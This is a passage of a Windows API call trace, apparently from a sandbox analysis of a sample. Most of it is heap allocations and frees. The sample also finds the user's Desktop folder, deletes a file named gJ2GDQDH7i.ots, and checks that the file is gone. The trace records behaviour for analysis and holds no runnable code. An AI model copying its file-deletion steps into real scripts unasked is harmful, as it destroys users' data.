(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0165.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0165.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.666] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0165.666] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0165.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.667] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6a) returned 0x240c948 [0165.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gJ2GDQDH7i.ots", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJ2GDQDH7i.ots", lpFilePart=0x8bedfc*="gJ2GDQDH7i.ots") returned 0x34 [0165.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0165.668] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJ2GDQDH7i.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gj2gdqdh7i.ots")) returned 0x20 [0165.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJ2GDQDH7i.ots", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f07050, ftCreationTime.dwHighDateTime=0x1d4c62b, ftLastAccessTime.dwLowDateTime=0x8bd0fab0, ftLastAccessTime.dwHighDateTime=0x1d4cdf4, ftLastWriteTime.dwLowDateTime=0x8bd0fab0, ftLastWriteTime.dwHighDateTime=0x1d4cdf4, nFileSizeHigh=0x0, nFileSizeLow=0x802, dwReserved0=0x49, dwReserved1=0x4, cFileName="gJ2GDQDH7i.ots", cAlternateFileName="GJ2GDQ~1.OTS")) returned 0xaa55e0 [0165.669] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJ2GDQDH7i.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gj2gdqdh7i.ots")) returned 1 [0165.670] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f07050, ftCreationTime.dwHighDateTime=0x1d4c62b, ftLastAccessTime.dwLowDateTime=0x8bd0fab0, ftLastAccessTime.dwHighDateTime=0x1d4cdf4, ftLastWriteTime.dwLowDateTime=0x8bd0fab0, ftLastWriteTime.dwHighDateTime=0x1d4cdf4, nFileSizeHigh=0x0, nFileSizeLow=0x802, dwReserved0=0x49, dwReserved1=0x4, cFileName="gJ2GDQDH7i.ots", cAlternateFileName="GJ2GDQ~1.OTS")) returned 0 [0165.670] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0165.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.671] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0165.671] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0165.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.672] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0165.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0165.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6a) returned 0x240c948 [0165.674] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gJ2GDQDH7i.ots", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJ2GDQDH7i.ots", lpFilePart=0x8bf658*="gJ2GDQDH7i.ots") returned 0x34 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0165.674] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJ2GDQDH7i.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gj2gdqdh7i.ots")) returned 0xffffffff [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.674] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: 